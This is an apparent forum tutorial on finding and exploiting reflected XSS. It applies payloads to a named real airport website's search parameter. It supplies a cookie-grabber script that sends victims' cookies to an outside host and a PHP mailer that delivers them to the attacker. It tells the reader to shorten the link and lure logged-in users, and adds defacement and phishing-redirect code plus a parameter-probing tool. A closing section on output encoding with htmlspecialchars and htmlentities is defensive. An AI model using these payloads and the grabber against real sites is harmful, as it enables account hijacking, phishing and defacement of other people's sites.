
Hunting for XSS Vulnerabilities


Finding a website vulnerable to XSS is not very difficult.
In most cases it is enough to type the following into the site's search field:

Code:
"><script>alert('try_xss');</script>

This payload does nothing more than pop an alert. The leading "> closes the attribute and the tag into which the search term is echoed, so if the alert appears the page has inserted our input into its HTML without encoding it.


Now we try:

Code:
"><script>alert(document.cookie);</script>

(Not alert('document.cookie'): with the quotes, the alert would only display that literal text.) If the XSS works, the alert shows our own session cookies for the site.


If the alert does not fire when the payload is typed into the search box, look instead at how the site builds the URL:

Example:

The last XSS I discovered was on the "Aeroporto di Puglia" website:

http://www.seap-puglia.it/

If we type "><script>alert('try_xss');</script> into the search box, nothing happens.
But now look at the URL the search produced:

Link:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1=%22%3E%3Cscript%3Ealert('try_xss');%3C/script%3E&strRicerca2=&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0

Here we find the parameter that carries the search term, in this case strRicerca1 (%22%3E%3Cscript%3E is our "><script> URL-encoded).

Now we put the payload directly into that parameter:

Link:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script>alert('try_xss');</script>

This time the alert fires.

Now we try:

Link:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script>alert(document.cookie);</script>

Perfect! We see our cookie!
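The steps above (inject a marker, look at which parameter echoes it back, check whether it came back raw or encoded) can be automated. The following is an added example, not code from the original post: it probes every query parameter of a URL with a unique canary and classifies the reflection. The HTTP layer is a stub (fetchBody) and the target URL and the vulnerable page are constructed to mirror the behaviour described above, so it runs offline; the domain example.test is hypothetical.

```javascript
// Reflected-XSS parameter probe. For every query parameter in a URL it injects a unique
// canary, fetches the page and reports whether the canary came back raw (exploitable),
// entity-encoded (safe) or not at all. Added example; fetchBody is a stub so this runs offline.

// The canary carries the two things this page's payloads depend on: a double quote to
// close the value="..." attribute and angle brackets to open a tag. The parameter name
// inside it tells us which parameter produced a given reflection.
function canaryFor(name) {
  return `"><xss-${name}>`;
}

// Minimal HTML entity encoding, used only to recognise an encoded reflection.
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Copy of the URL with one parameter replaced by its canary (the other parameters are
// left untouched so the page still renders its normal search form).
function injectParam(url, name) {
  const u = new URL(url);
  u.searchParams.set(name, canaryFor(name));
  return u.toString();
}

// 'raw' if the canary survived unencoded, 'encoded' if it came back as entities,
// 'absent' if the parameter is not echoed into the page at all.
function classifyReflection(body, canary) {
  if (body.includes(canary)) return 'raw';
  if (body.includes(htmlEncode(canary))) return 'encoded';
  return 'absent';
}

// fetchBody(url) returns the response body as a string. In a real probe this is an
// HTTP GET; it is passed in so the logic can be exercised against a stub.
function probeParams(url, fetchBody) {
  const results = {};
  for (const name of new URL(url).searchParams.keys()) {
    const body = fetchBody(injectParam(url, name));
    results[name] = classifyReflection(body, canaryFor(name));
  }
  return results;
}

// Constructed stand-in for a vulnerable search page, modelled on the behaviour described
// in the post and not a real response: strRicerca1 is echoed into a value attribute
// unencoded, strRicerca2 is encoded, the remaining parameters are never echoed.
function fakeSearchPage(url) {
  const p = new URL(url).searchParams;
  return `<form><input name="strRicerca1" value="${p.get('strRicerca1') || ''}">` +
         `<input name="strRicerca2" value="${htmlEncode(p.get('strRicerca2') || '')}"></form>`;
}

// Hypothetical target URL (example.test is a reserved test domain).
const TARGET = 'http://example.test/default.asp?rif=1&tiporicerca=2&strRicerca1=&strRicerca2=&sel1=AND';

// probeParams(TARGET, fakeSearchPage) reports strRicerca1 as 'raw', strRicerca2 as
// 'encoded' and rif/tiporicerca/sel1 as 'absent'.
```

The canary deliberately contains only the characters the payload needs, not a full `<script>` tag, so it is less likely to trip a naive filter while still telling us whether the quote and angle brackets survive. Against a real target, replace fakeSearchPage with an HTTP client and inspect the 'raw' hits by hand, since where the reflection lands (attribute, text, script block) decides the final payload.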

An alert only shows us our own cookie. To get the victim's, we use a "cookie grabber": a script hosted on our own server that the injected payload loads into the page, so that the victim's browser sends its cookies to us.

To include an external JavaScript file we write:

Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>

Inside the file "cookiescript.js" we put code that reads the cookie and sends it to us by e-mail.


First of all, cookiescript.js has to redirect the victim to a page on our server, passing the cookie along as a parameter. The file contains only JavaScript (no <script> tags), and the cookie string must be URL-encoded because it contains ";" and "=" which would otherwise break the query string:

Code:
location.href = "http://googlebig.com/cookie.php?cookie=" + encodeURIComponent(document.cookie);


Now we create cookie.php, which mails us whatever arrives in the cookie parameter:
Code:
<?php mail("admin@googlebig.com", "Here's the stolen cookie", $_GET['cookie']); ?>


Now we upload cookie.php and cookiescript.js to our server and open:

Code:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script src="http://www.googlebig.com/cookiescript.js"></script>

If everything works we receive our own cookie by e-mail.

Now we send the link to the victim, either the full link or one shortened with a redirect service such as http://www.tinyurl.com

Once the redirect is created, in this case http://tinyurl.com/2rgry5 , we contact the user, preferably through the same site, to make sure they open the link while logged in.
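Two details of the exfiltration step deserve a closer look: the cookie string has to be URL-encoded before it goes into the query string, and the grabber can only ever see cookies that document.cookie exposes. The following is an added example, not code from the original post; the collector URL and the Set-Cookie headers are constructed for the demonstration.

```javascript
// The exfiltration step of the grabber above, plus the check that decides whether a
// grabber can work at all: document.cookie never exposes cookies set with HttpOnly.
// Added example; the collector URL and the Set-Cookie headers are constructed.

// URL the grabber script sends the victim's browser to. The cookie string contains
// ';' and '=' separators, so it must be URL-encoded or the collector's $_GET['cookie']
// will be cut off at the first ';'. URLSearchParams does that encoding for us.
function buildGrabberUrl(collector, cookieString) {
  const u = new URL(collector);
  u.searchParams.set('cookie', cookieString);
  return u.toString();
}

// Parse one Set-Cookie header into the cookie name and the flags we care about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const name = pair.slice(0, pair.indexOf('='));
  const flags = new Set(attrs.map(a => a.split('=')[0].toLowerCase()));
  return { name, httpOnly: flags.has('httponly'), secure: flags.has('secure') };
}

// Names of the cookies a script injected into the page could read. HttpOnly cookies
// are still sent with every request but are hidden from document.cookie, so if the
// session cookie is HttpOnly the grabber only ever receives the harmless ones.
function cookiesExposedToScript(setCookieHeaders) {
  return setCookieHeaders.map(parseSetCookie)
    .filter(c => !c.httpOnly)
    .map(c => c.name);
}

// Constructed headers for a hypothetical server response.
const SAMPLE_SET_COOKIE = [
  'sessionid=s3cr3t; path=/; HttpOnly',
  'lang=it; path=/',
  'tracker=42; path=/; Secure',
];

// cookiesExposedToScript(SAMPLE_SET_COOKIE) returns ['lang', 'tracker']: the session
// cookie is unreachable, which is exactly why HttpOnly is the first mitigation to check for.
```

Before building a grabber, read the target's Set-Cookie headers in the browser's network tab or with curl -I. If the session cookie carries HttpOnly, cookie theft through this XSS is off the table and the injection is better used for the redirect or phishing approach described further down.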

XSS THAT DOESN’T WORK

If an XSS gives us neither a redirect nor the cookie, it can still be used to turn the page into a phishing or defacement page.

An example is this script.js, which wipes the page and replaces it with our own content:
Code (JavaScript):
var title = "XSSED BY GOOGLEBIG.COM";
var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here  ";
var font_color = "#FFFFFF";

deface(title, bgcolor, image_url, text, font_color);

// Replace the whole document body with a centred overlay: text, optional image, footer.
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
  document.title = pageTitle;
  document.body.innerHTML = '';
  document.bgColor = bgColor;
  var overLay = document.createElement("div");
  overLay.style.textAlign = 'center';
  document.body.appendChild(overLay);
  var txt = document.createElement("p");
  txt.style.font = 'normal normal bold 36px Verdana';
  txt.style.color = fontColor;
  txt.innerHTML = pageText;
  overLay.appendChild(txt);
  if (imageUrl != "") {
    var newImg = document.createElement("img");
    newImg.setAttribute("border", '0');
    newImg.setAttribute("src", imageUrl);
    overLay.appendChild(newImg);
  }
  var footer = document.createElement("p");
  footer.style.font = 'italic normal normal 12px Arial';
  footer.style.color = '#DDDDDD';
  footer.innerHTML = pageTitle;
  overLay.appendChild(footer);
}



This script is loaded the same way as the cookie script:

Code:
http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>

The victim then sees the page our JavaScript builds instead of the original one.

Here too we can use tinyurl to mask the full URL and let the redirect point straight at the script:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>

Another way to bring the victim to a page of our choosing is a plain redirect:
Code:
http://[Sitevictim]/page.php?variable="><script>location.href="http://www.googlebig.com/fakepage.htm"</script>

To fix a cross-site scripting problem in PHP we can use one of three functions.

They all neutralise HTML in the user's input before it is printed, so injected markup is displayed as text rather than interpreted by the browser.

The most used is htmlspecialchars(), which converts "&", "<", ">" and the double quote into "&amp;", "&lt;", "&gt;" and "&quot;" (and, with the ENT_QUOTES flag, the single quote into "&#039;").

Another option is htmlentities(), which does the same but also converts every other character that has a named HTML entity.
Code PHP:
<?php
// This page shows an example
// of the differences in output between 2 functions
$input = '<script>alert(1);</script>';
echo htmlspecialchars($input) . '<br />';
echo htmlentities($input);
?>
An example of htmlentities()
Code PHP:
<?php
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
echo htmlentities($str, ENT_QUOTES);
?>

The first shows -> A 'quote' is &lt;b&gt;bold&lt;/b&gt;
The second -> A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;
An example of htmlspecialchars()
Code PHP:
<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new;
?>





This shows -> &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
The function strip_tags(), instead, removes all HTML tags except those explicitly allowed in its second argument, such as <i>, <b> or <p>.
An example of strip_tags()
Code PHP:
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// allow <p>
echo strip_tags($text, '<p>');
?>

The first echo prints "Test paragraph. Other text" (tags and the comment are removed); the second prints "<p>Test paragraph.</p> Other text" because <p> is allowed.

Now that we know these functions exist, we apply them in the code when we find an XSS in our own web application.

I recently found an XSS in the Video section of GoogleBig, which is a plugin for the MyBB forum. I have included a piece of the code to give an idea of how I applied the function to fix the search bug.

First of all I found the PHP page in question: search.php

Now let's look for the portion of code that handles the search: it takes the query, runs it and outputs the result:


Code PHP:
function search($query, $page)
{
    global $db, $bgcolor2, $bgcolor4, $sitename, $io_db, $module_url, $list_page_items, $hm_index;
    $option = trim($option);
    $query = trim($query);
    $query = FixQuotes(nl2br(filter_text($query)));
    $db->escape_string($query);
    $db->escape_string($option);
    alpha_search($query);
    ...


In this case the variable that carries the user's value is $query, so we apply htmlentities() to it:
Code PHP:
$query = FixQuotes(nl2br(filter_text(htmlentities($query))));

This stops both payloads shown above: the "<" of <script> becomes "&lt;" and the "> that closes the attribute becomes "&quot;&gt;", so nothing is parsed as markup. Two cautions for a real fix: pass ENT_QUOTES as the second argument (before PHP 8.1 the default leaves single quotes alone, which still allows breaking out of a single-quoted attribute), and prefer encoding at output time, where the value is echoed into HTML, rather than at input time as done here, because encoding before the database escape stores entity-encoded text and corrupts any non-HTML use of the same value.
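To see exactly what the encoding does to the payloads used earlier on this page, and why the quote flag matters, here is the htmlspecialchars() rule set reimplemented in JavaScript. This is an added example, not code from the GoogleBig plugin or from PHP; the search-result template (renderSearch) and the two payload constants are hypothetical, constructed so the effect of each flag can be checked without a PHP install.

```javascript
// Output encoding with the same rules as PHP's htmlspecialchars(), written in JavaScript
// so the effect on this page's payloads can be checked without PHP. Added example, not
// code from the GoogleBig plugin. ENT_COMPAT (PHP's default before 8.1) encodes & < > and
// the double quote; ENT_QUOTES additionally encodes the single quote.
const ENT_COMPAT = 'ENT_COMPAT';
const ENT_QUOTES = 'ENT_QUOTES';

function htmlspecialchars(s, flags = ENT_COMPAT) {
  let out = s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
             .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
  if (flags === ENT_QUOTES) out = out.replace(/'/g, '&#039;');
  return out;
}

// Hypothetical search-result template: the term is echoed into a double-quoted
// attribute, a single-quoted attribute and a text node, three different contexts.
function renderSearch(query, flags) {
  const q = htmlspecialchars(query, flags);
  return `<input name="q" value="${q}">` +
         `<input name="q2" value='${q}'>` +
         `<p>Results for ${q}</p>`;
}

// True when the encoded value still contains the quote character that delimits the
// attribute it lands in, i.e. the attacker can close the attribute and add their own.
function breaksOutOf(quoteChar, query, flags) {
  return htmlspecialchars(query, flags).includes(quoteChar);
}

// Number of tags in the rendered page beyond the template's own four
// (<input>, <input>, <p>, </p>). Anything above zero is injected markup.
function injectedTags(query, flags) {
  const tags = (renderSearch(query, flags).match(/<\/?[a-zA-Z]/g) || []).length;
  return tags - 4;
}

// The payload from the walkthrough above, and one aimed at a single-quoted attribute.
const PAYLOAD_TAG = '"><script>alert(document.cookie);</script>';
const PAYLOAD_ATTR = "' onmouseover='alert(document.cookie)";

// htmlspecialchars(PAYLOAD_TAG) gives
// &quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
// breaksOutOf("'", PAYLOAD_ATTR, ENT_COMPAT) is true: the single quote survives.
// breaksOutOf("'", PAYLOAD_ATTR, ENT_QUOTES) is false.
```

The last two results are the point of the ENT_QUOTES advice: with the pre-8.1 default, a value echoed into value='...' is still exploitable even though the <script> payload is neutralised. Encoding is context-dependent; these functions are right for HTML text and quoted attributes, and not sufficient for a value placed inside a <script> block or an unquoted attribute.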



If you have problems you can comment here, or consult the manuals for the three PHP functions we saw:

http://php.net/htmlentities
http://php.net/htmlspecialchars
http://php.net/strip_tags
Leader at J2TEAM. Website: https://j2team.dev/
